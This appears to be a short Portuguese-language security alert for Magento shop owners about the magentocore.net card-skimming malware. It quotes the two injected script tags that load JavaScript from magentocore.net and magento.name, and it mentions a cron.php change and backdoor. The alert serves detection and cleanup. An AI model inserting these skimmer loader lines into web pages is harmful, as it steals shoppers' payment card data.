Malware: magentocore.net [ALERTA]

No mês passado, uma infecção de milhares de lojas de Magento foi relatada devido a um malware de um site chamado magentocore.net. Isso é tudo o que você precisa saber e por que não é seguro instalar as coisas sem uma boa revisão.

Esteja ciente do malware magentocore.net

Verifique se o seguinte código foi adicionado ao campo de cabeçalho ou rodapé em seu backend do Magento:

<script type = "text / javascript" src="https://magentocore.net/mage/mage.js"> </script>  

Após a primeira onda de ataques e uma proibição do google em hackers de domínio magentocore.net mudou para magento.name

<script type = "text/ javascript" src="https://magento.name/mage/mage.js"> </script> 

Esses scripts não parecem prejudiciais à primeira vista, por causa do Magento no nome do domínio.

Essa linha de código solitária carrega e executa o código JavaScript nos navegadores de seus clientes e envia dados de cartão de crédito.

Minha loja foi hackeada … e agora?

Este malware específico é um demônio. Obviamente, apenas adicionou uma linha de código de inserção de JavaScript. O problema: se você removê-lo, pode estar lá depois de algum tempo novamente.

Como isso é possível? O malware magentocore.net altera seu cron.php e adiciona um backdoor em qualquer lugar/pasta de sua instalação Magento. Sua loja não é mais segura e identificar todos os problemas poderá levar muito tempo e ainda assim deixar alguma brecha de segurança.

Volte para a última versão válida do seu repositório.

Entre em contato para que eu possa te ajuda!